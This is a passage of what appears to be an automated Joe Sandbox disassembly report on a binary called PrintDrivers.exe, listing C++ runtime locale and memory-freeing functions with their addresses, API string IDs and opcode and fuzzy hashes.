                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                    • String ID:
                                                                    • API String ID: 419941038-0
                                                                    • Opcode ID: 134387417ae83d5880854e82e4066d439003b3b342e9d25b5f0d65bfed55a888
                                                                    • Instruction ID: 98d19d7547cb419830ef85fe39b42e983c2d0a09b2706708460c1bcf7e92c4f9
                                                                    • Opcode Fuzzy Hash: 134387417ae83d5880854e82e4066d439003b3b342e9d25b5f0d65bfed55a888
                                                                    • Instruction Fuzzy Hash: 42016D3590061A9FCF05FBA48959ABE7FA1FFC4320F654509E815AB291DF709E0ACB81
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005966AD
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005966B7
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • numpunct.LIBCPMT ref: 005966F1
                                                                    • std::_Facet_Register.LIBCPMT ref: 00596708
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00596728
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                    • String ID:
                                                                    • API String ID: 743221004-0
                                                                    • Opcode ID: 0dfeb009a9a1336ebd17b30a6ac8c29529e1d9bae25fc9646c20c7017541e700
                                                                    • Instruction ID: 5c1a8c581f19e878a6639cf7f0b1f384e399169bde823ee31feb7c76125e4f2e
                                                                    • Opcode Fuzzy Hash: 0dfeb009a9a1336ebd17b30a6ac8c29529e1d9bae25fc9646c20c7017541e700
                                                                    • Instruction Fuzzy Hash: 4A016D3590012A9FCF05EBA4C859ABE7FB1FF84710F244509E851AB291EF709E0A8B81
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005A071C
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005A0726
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • collate.LIBCPMT ref: 005A0760
                                                                    • std::_Facet_Register.LIBCPMT ref: 005A0777
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005A0797
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                    • String ID:
                                                                    • API String ID: 1007100420-0
                                                                    • Opcode ID: 7b85bb12f90be4d75e7d53eb90db03f057ed75dc1504d703d10534cde940c0c0
                                                                    • Instruction ID: e85c049705d13c326501ada00ec5f0b96ec32fc3c544c1d5e037f3b547a8ce20
                                                                    • Opcode Fuzzy Hash: 7b85bb12f90be4d75e7d53eb90db03f057ed75dc1504d703d10534cde940c0c0
                                                                    • Instruction Fuzzy Hash: B301A13590022A9BCF05EBA0C849ABD7FB1FFC5320F141509E4146B2D1DF70AE058B81
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005A07B1
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005A07BB
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • messages.LIBCPMT ref: 005A07F5
                                                                    • std::_Facet_Register.LIBCPMT ref: 005A080C
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005A082C
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                    • String ID:
                                                                    • API String ID: 2750803064-0
                                                                    • Opcode ID: f4a37311e9aef5a932685ce83aba0b13768e0363fcb6f01901546f3dbb5e34cd
                                                                    • Instruction ID: 538c1b772ec8dec9c1bcd139bfb9f8e98015eea9b1340b675de2b5e18074ba0c
                                                                    • Opcode Fuzzy Hash: f4a37311e9aef5a932685ce83aba0b13768e0363fcb6f01901546f3dbb5e34cd
                                                                    • Instruction Fuzzy Hash: A90182359002178BCB05ABA08849ABD7FA1FBC5320F150508E4616B2D1DF749E468BC1
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005A0970
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005A097A
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • moneypunct.LIBCPMT ref: 005A09B4
                                                                    • std::_Facet_Register.LIBCPMT ref: 005A09CB
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005A09EB
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                    • String ID:
                                                                    • API String ID: 419941038-0
                                                                    • Opcode ID: b9f89996a415d7bd5aed113a54aaf0c86d6a8ac63dfd112ea58497a7fa838df6
                                                                    • Instruction ID: c17f95d715af25b26ff8672a1e438b8fbc91509e1815a4c949b2625128222b7c
                                                                    • Opcode Fuzzy Hash: b9f89996a415d7bd5aed113a54aaf0c86d6a8ac63dfd112ea58497a7fa838df6
                                                                    • Instruction Fuzzy Hash: 9501A13590021A8FDF05EBA48849ABF7FA1FFC5310F240508F455AB2D2DF749E468B81
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005A0A05
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005A0A0F
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • moneypunct.LIBCPMT ref: 005A0A49
                                                                    • std::_Facet_Register.LIBCPMT ref: 005A0A60
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005A0A80
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                    • String ID:
                                                                    • API String ID: 419941038-0
                                                                    • Opcode ID: 7026d152f0cf04fe6029656bbcc56421b2e135f38b9ebf54b2768078441ee6b7
                                                                    • Instruction ID: cf636241f89fa68d440448edd1478786a9775cc95c6ee895cc4e44d05d83f666
                                                                    • Opcode Fuzzy Hash: 7026d152f0cf04fe6029656bbcc56421b2e135f38b9ebf54b2768078441ee6b7
                                                                    • Instruction Fuzzy Hash: 0901AD3590021A9BCB05EBA4C849ABE7FB1FFC5310F245508F815AB2D2DF709E06CB80
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00595D5D
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00595D67
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • codecvt.LIBCPMT ref: 00595DA1
                                                                    • std::_Facet_Register.LIBCPMT ref: 00595DB8
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00595DD8
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                    • String ID:
                                                                    • API String ID: 712880209-0
                                                                    • Opcode ID: 2a43488bf508957ac076f1c7d64d55d7e5cd013975a9d0e9806b0fc2f1b1ad32
                                                                    • Instruction ID: b5b640efe73b1e440e65d4abecc5275e76a1555d7182cc4743b22c7de0c87416
                                                                    • Opcode Fuzzy Hash: 2a43488bf508957ac076f1c7d64d55d7e5cd013975a9d0e9806b0fc2f1b1ad32
                                                                    • Instruction Fuzzy Hash: 7501AD3590061A9BCF05EBA4885DABE7FA1FF84320F244509F815AB291EF709E068B80
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00595DF2
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00595DFC
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • collate.LIBCPMT ref: 00595E36
                                                                    • std::_Facet_Register.LIBCPMT ref: 00595E4D
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00595E6D
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                    • String ID:
                                                                    • API String ID: 1007100420-0
                                                                    • Opcode ID: 6d32f106c71cf24462c48119c730614cf8332c1b800aa627f40fd9bfd6621a27
                                                                    • Instruction ID: e77c49c97eca37a0f765fa5d396a6bfe197e2ccb0ea26e7fdf3690558b9d05a1
                                                                    • Opcode Fuzzy Hash: 6d32f106c71cf24462c48119c730614cf8332c1b800aa627f40fd9bfd6621a27
                                                                    • Instruction Fuzzy Hash: 9401C03590061ACBCF05FBA0C859ABE7FA5FFC4320F250548F811AB291EF709E068B80
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00595E87
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00595E91
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • collate.LIBCPMT ref: 00595ECB
                                                                    • std::_Facet_Register.LIBCPMT ref: 00595EE2
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00595F02
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                    • String ID:
                                                                    • API String ID: 1007100420-0
                                                                    • Opcode ID: e4f0c33038c8c14151175f6c63063aecb735bb9f6e97c31cc38b0cf5748d41a9
                                                                    • Instruction ID: 4736012f5f1870a9ba647a5fe40ced1c30cfa83171bfc116b7e3f1a2e5178b5d
                                                                    • Opcode Fuzzy Hash: e4f0c33038c8c14151175f6c63063aecb735bb9f6e97c31cc38b0cf5748d41a9
                                                                    • Instruction Fuzzy Hash: 2101A1359006168BCF05FBA0C849ABE7FA5FFC4310F140548F8156B291EF749E05CB90
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00595F1C
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00595F26
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • ctype.LIBCPMT ref: 00595F60
                                                                    • std::_Facet_Register.LIBCPMT ref: 00595F77
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00595F97
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
                                                                    • String ID:
                                                                    • API String ID: 83828444-0
                                                                    • Opcode ID: bd57ef8c03a24ec6f028b646d39d781d741ce6edac76c31238b099805b3839b0
                                                                    • Instruction ID: e880ed0a41da4341392f916b58214a4d64b763f9d5d7c7dc42b0c84262e2095d
                                                                    • Opcode Fuzzy Hash: bd57ef8c03a24ec6f028b646d39d781d741ce6edac76c31238b099805b3839b0
                                                                    • Instruction Fuzzy Hash: 4101A17590061A9FCF05EBA48859ABE7FB1FFC4320F140509F4556B291EF709E05CB81
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00595FB1
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00595FBB
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • messages.LIBCPMT ref: 00595FF5
                                                                    • std::_Facet_Register.LIBCPMT ref: 0059600C
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0059602C
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                    • String ID:
                                                                    • API String ID: 2750803064-0
                                                                    • Opcode ID: ffdcd424151f57ebb858f85c239507ee6b71ec3b0cc44baa3b1e6c5cd3f372df
                                                                    • Instruction ID: 2e6189be0567dd2ea31fb154eda576422c1c42967bcc69e3f8d69d7afb9b6710
                                                                    • Opcode Fuzzy Hash: ffdcd424151f57ebb858f85c239507ee6b71ec3b0cc44baa3b1e6c5cd3f372df
                                                                    • Instruction Fuzzy Hash: DB01AD3590021A9BCF05FBA0884DABE7FA1FF84320F241509F810AB291DF709E0ACB80
                                                                    APIs
                                                                    • _free.LIBCMT ref: 005BD746
                                                                      • Part of subcall function 005B6238: HeapFree.KERNEL32(00000000,00000000,?,005BD9CF,?,00000000,?,?,?,005BDC72,?,00000007,?,?,005BE165,?), ref: 005B624E
                                                                      • Part of subcall function 005B6238: GetLastError.KERNEL32(?,?,005BD9CF,?,00000000,?,?,?,005BDC72,?,00000007,?,?,005BE165,?,?), ref: 005B6260
                                                                    • _free.LIBCMT ref: 005BD758
                                                                    • _free.LIBCMT ref: 005BD76A
                                                                    • _free.LIBCMT ref: 005BD77C
                                                                    • _free.LIBCMT ref: 005BD78E
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: e69f4ad8cba7ea251906260e85370a879746d70718278bc4167b4d8b121bd4d5
                                                                    • Instruction ID: 589c69bbb7ec096bbf52dd24406000cd160c4623ca552681b73ec698eee39fa0
                                                                    • Opcode Fuzzy Hash: e69f4ad8cba7ea251906260e85370a879746d70718278bc4167b4d8b121bd4d5
                                                                    • Instruction Fuzzy Hash: A9F01237505205ABD620EB58F5CADD6BBEDFB547107A44916F00ADB501DB38FC808B65
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3__swprintfctype
                                                                    • String ID: %.0Lf
                                                                    • API String ID: 815090475-1402515088
                                                                    • Opcode ID: 3f7d546adf471f91502bfdc070e22e883cbc59ee72fd6b62fa143179c492e5f1
                                                                    • Instruction ID: 653ee3d36a0e3761d12e58c5c6d125adf62559806ce021dde9dc25c80754d7cc
                                                                    • Opcode Fuzzy Hash: 3f7d546adf471f91502bfdc070e22e883cbc59ee72fd6b62fa143179c492e5f1
                                                                    • Instruction Fuzzy Hash: CC517A72D00209ABDF05EFD4D849ADE7FB9FF48310F204859F845AB291DB799948CB90
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3__swprintfctype
                                                                    • String ID: %.0Lf
                                                                    • API String ID: 815090475-1402515088
                                                                    • Opcode ID: d325cf075659a2ba76ad5f88547007f12f2041035c2fb11df52ed58cc71edbbc
                                                                    • Instruction ID: 2ef53279515a88e44e4eadc0ca5eebaf778574c6fee46a3f97a19af3adc3bac0
                                                                    • Opcode Fuzzy Hash: d325cf075659a2ba76ad5f88547007f12f2041035c2fb11df52ed58cc71edbbc
                                                                    • Instruction Fuzzy Hash: F3516AB2D00209ABCF05EFD4C849ADEBFB9FB48314F204459F446AB295DB759A49CF90
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 005A35A8
                                                                      • Part of subcall function 00588830: std::_Lockit::_Lockit.LIBCPMT ref: 00588860
                                                                      • Part of subcall function 00588830: std::_Lockit::_Lockit.LIBCPMT ref: 00588882
                                                                      • Part of subcall function 00588830: std::_Lockit::~_Lockit.LIBCPMT ref: 005888AA
                                                                      • Part of subcall function 00588830: std::_Lockit::~_Lockit.LIBCPMT ref: 005889E2
                                                                    • _Find_elem.LIBCPMT ref: 005A3642
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                     • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                    • String ID: 0123456789-$0123456789-
                                                                    • API String ID: 3042121994-2494171821
                                                                    • Opcode ID: 7607ea0db42f393daf5a97937bbcf2763ea184bc9afee1745de415f43c60c6c1
                                                                    • Instruction ID: 08f7d9f9e22806718aa5e1643441bee7ecfc6bf8a21d760f96ea251e02cc0204
                                                                    • Opcode Fuzzy Hash: 7607ea0db42f393daf5a97937bbcf2763ea184bc9afee1745de415f43c60c6c1
                                                                    • Instruction Fuzzy Hash: 7D417A31900209EFCF09EF94D885AEEBFB5FF59314F100059F811A7292DB359A46CBA5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                     • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: C:\Games\PrintDrivers.exe
                                                                    • API String ID: 0-3864340707
                                                                    • Opcode ID: ba25282a1faa881f1b46733896fe6720c2abf6cffcde5b2685c5d4cbd3973f60
                                                                    • Instruction ID: 1a228f6c29688c184271b1f6bad3a97a97983c42edf77cf7772133cdd975d33d
                                                                    • Opcode Fuzzy Hash: ba25282a1faa881f1b46733896fe6720c2abf6cffcde5b2685c5d4cbd3973f60
                                                                    • Instruction Fuzzy Hash: 5B315C71A00659AFCB25DB9998899EEBFBCFBD9310B500067F401EB251E770AB44DB90
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0059F232
                                                                      • Part of subcall function 00595F15: __EH_prolog3.LIBCMT ref: 00595F1C
                                                                      • Part of subcall function 00595F15: std::_Lockit::_Lockit.LIBCPMT ref: 00595F26
                                                                      • Part of subcall function 00595F15: std::_Lockit::~_Lockit.LIBCPMT ref: 00595F97
                                                                    • _Find_elem.LIBCPMT ref: 0059F2CE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                     • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                    • String ID: %.0Lf$0123456789-
                                                                    • API String ID: 2544715827-3094241602
                                                                    • Opcode ID: 2b874b6b5261be6d3464600377e40dc45651aedcd7204d4edb25ec9091ccce50
